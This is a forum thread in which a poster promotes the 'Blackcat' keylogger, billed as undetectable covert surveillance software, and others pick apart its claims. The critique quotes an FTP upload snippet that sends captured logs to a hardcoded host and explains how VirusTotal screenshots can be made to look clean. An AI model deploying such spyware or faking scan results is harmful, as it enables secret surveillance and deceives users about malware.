Blackcat Keylogger

malware
programming
hacking

(AR) #1

** DISCLAIMER: OUR TOOLS ARE FOR EDUCATIONAL PURPOSES ONLY. DON’T USE THEM FOR ILLEGAL ACTIVITIES. YOU ARE THE ONLY RESPONSABLE FOR YOUR ACTIONS! OUR TOOLS ARE OPEN SOURCE WITH NO WARRANTY AND AS ARE.**

logon

Blackcat Keylogger is 100% invisible keylogger not only for users but also undetectable by antivirus software. Blackcat keylogger Monitors all keystrokes, mouse clicks. It has a separate process which continues capture system screenshot and sends to FTP server in given time.

FEATURES OF BLACKCAT KEYLOGGER

  • Discrete/Tamper Proof: By design, Advance Keylogger is undetectable and thus cannot be tampered with or removed by kids/employees (who are often tech savvy). It does not appear in the Registry, the Process List, the System Tray, the Task Manager, on the Desktop, or in the Add/Remove programs.
  • Keystrokes Typed: See every keystroke typed even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity so you can see every detail.
  • Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it’s being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).
  • FTP Server: Screenshot and keylogger Logfile which contain sensitive user information send to FTP server (Mobile/Web/System). Powerful FTP server also writes in Core Visual C++.
  • AutoStart: Keylogger has the functionality to auto-execute on system bootup. It Inserts entry on system startup program when it is running.
  • AutoCopy : Keylogger has functionality to auto copy in %appdata%/roaming/wpdnse/ folder.

More Deatails Visit Github : https://github.com/ajayrandhawa/Blackcat-Keylogger


Blackcat Screen Capture
#2

I’m always happy to find new open source software to learn something from its code, but there are some things that don’t add up with this one. Starting from the picture of the VirusTotal report you included in the GitHub repository:

  • Having your files tagged as being published from a trusted developer takes quite an effort, VirusTotal needs to verify the file is actually benign and will take some time to do that so people can trust them when they say the file isn’t malicious and comes from someone with a good reputation, and I’m pretty sure they would notice this is a keylogger if they checked, I’ll explain why later. So this is a little suspicious already. “A little”.
  • Why did you remove the file name from the report? The keylogger has two different executables, each with its own name, so it’s impossible to tell which one you have scanned from this screenshot, and why would you want to do that when advertising your 100% stealthy software? Don’t you think it’s a little bit fishy?
  • Well damn, that’s a high community score, I wouldn’t expect more than a thousand people voting this file as benign, how odd.
  • And finally, why didn’t you include the actual link to the scan instead of making a screenshot? I think I know why.

You have two different executables in the repository, one to capture keystrokes and another to send the logs over FTP (we’ll come to that later). The SHA-256 hash of the actual keylogger program is this:

53e57c196cc3c46937947309c9b0988e2c3a7ddb2d19be9cba9390ac6d65c069

While this is the hash of the other executable:

d975aec8184308df033b5fad5dfa2293d1a15814b31b1ebf671fabbd7c04841a

They are both different from the hash in the picture, and in fact, they give two completely different results from VirusTotal: logger (27/68), sender (26/68). The only way I managed to obtain the same hash you have in your picture with these executables is by dragging and dropping the files from the .rar archive straight into VirusTotal without extracting them inside another folder first, it’s quite curious really, but anyway, this is the scan I obtained with that method, and I include only one because both files returned the same exact hash, and the same file name, which seems to change every few scans, right now the file is called “293”, score 0/59, community score +812. Clicking on it again gave me a new name: “playview.apk”. In the Details tab you can actually see all the different names VirusTotal has collected for the same file, and I have to admit I was surprised when I saw “<PATH_SAMPLE>” in the list. We can conclude that the screenshot on GitHub isn’t accurate or trustworthy, because after a couple tests I discovered any file you extract from a .rar archive like that will give the same exact harmless looking hash, that’s why the result is 0/59, because you’re not actually scanning the original files. I still have to understand if this depends on the archive manager being used, I only tried with WinRAR because I’m lazy. But I think I just discovered a way to trick naive people with pictures of VirusTotal scans now.

So the keylogger isn’t really “100% invisible”, even Defender moved it in quarantine when I tried to download the archive from GitHub, I had to white list it in order to finish the download, and the same happened when I extracted the executables, flagging them as “Trojan:Win32/Tiggre!rfn”.

Finally, I haven’t tested the program because I don’t have a Windows VM at hand, but I did take a look at the code and I noticed a couple things with the two functions that send logs and images over FTP. Here’s an extract from the ftplogsend() function:

hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));

You hardcoded an IP address and port to the program, so if I didn’t want to recompile everything from scratch I would have to change my subnet mask, since the default mask for home networks is 255.255.255.0 (and the provided address is Class C, so I can’t receive the logs unless I have my own server in the local network of my target), giving only 254 possible addresses, which do not include 192.168.8.2, and then I would also need to set up a static address for my FTP server.

Although the detail that caught my eye is another one: no credentials are needed to upload files on the FTP server: those two NULL parameters inside the call to InternetConnect() are supposed to be username and password to have access to the server, but requiring no credentials means virtually anyone can log in as anonymous and find the entire list of logs and pictures, download them, and even alter them as they please since it’s possible to overwrite files with a simple put command over FTP, or simply delete them with delete.

This is even worse when you remember that FTP alone provides no encryption whatsoever, everything travels in clear text: anyone in your network can fire up tcpdump or Wireshark and intercept your server’s IP address, port, and view every screenshot and log that is being sent. Also 2121 is an unusual port number, a local firewall could block those outbound packets quite easily if it was set properly.

So… this isn’t really all that secure isn’t it? I could see this as a little experimental project but you mentioned “1,000 screenshots included with purchase”, so you’re planning to sell it? I don’t know, there already are safe keyloggers out there, free ones too, I wouldn’t recommend anyone to buy this particular one if they were looking for a serious security-based program.


(← ∨ ↑ = ␀) #3

I thoroughly enjoyed this post. Would read again.

10/10


#4

tskmgr

delsvc

:thinking:

I don’t see any references to mouse activity in your open source code nor in the downloaded executables. :shushing_face:


#5

This is why I love this community. The poor guy was just trying to show off his 100% undetectable super 1337 keylogger, and you all had to go ahead and rip his program a new one. I love 0x00sec.


(Co-Founder and Part-time Fool ) #6

Pretty sure that’s social capitalism at work.

Sweet sweet social capitalism.

He did make a lot of claims, and everybody here kept him honest to them.


(AR) #7

Thanks for All Your Reviews


(system) #8

This topic was automatically closed after 30 days. New replies are no longer allowed.